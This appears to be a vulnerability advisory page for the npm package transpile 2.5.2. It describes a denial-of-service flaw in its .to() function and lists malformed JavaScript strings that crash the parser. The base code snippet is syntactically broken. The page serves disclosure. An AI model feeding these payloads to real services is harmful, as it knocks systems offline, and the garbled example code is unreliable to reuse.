transpile@2.5.2 vulnerabilities

Transpiles JavaScript modules from one format to another.

Direct Vulnerabilities

Known vulnerabilities in the transpile package. This does not include vulnerabilities belonging to this package’s dependencies.

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VulnerabilityVulnerable Version
  • M
Denial of Service (DoS)

transpile is a Transpiles JavaScript modules from one format to another.

Affected versions of this package are vulnerable to Denial of Service (DoS) due to a lack of input sanitization or whitelisting, coupled with improper exception handling in the .to() function.


Base code:

var transpile = require('transpile');
data = <string_here>{
            name: "mod",
            source: data,
            metadata: {format: "cjs"}
        }, "amd")

Possible payloads to replace <string_here>:

Rest parameter must be last formal parameter 
"o=(...D (...D wwequ 7equire'foo')" 

Invalid regular expression 
"!/var foo =var foo = require(var foo = require('fovar foo = require('foo')"  

Invalid left-hand side in for-loop
"for ('ofq(foo,reqor ('of"

Octal literals are not allowed in template strings.

Invalid left-hand side in assignment
"var foo = ~e = foo equ= equi"

Invalid left-hand side in for-in
"for(fn^t in^suiS\re"

Unexpected quasi ...
"var`foo =i,var`fo"  

Unexpected Number
"var foo 5 reouire('fqo')"  
Unexpected token ILLEGAL
"re('fooqWb resuYxS\re)'"      

Label '...' has already been declared
"r; reqa: reqa:e;oo ; ; reqrequirr('fsreRo')"

Unexpected end of input
"ir%(f= r,)/" 

Unexpected string
"v')ar foo = require('fooequi')" 

How to fix Denial of Service (DoS)?

There is no fixed version for transpile.
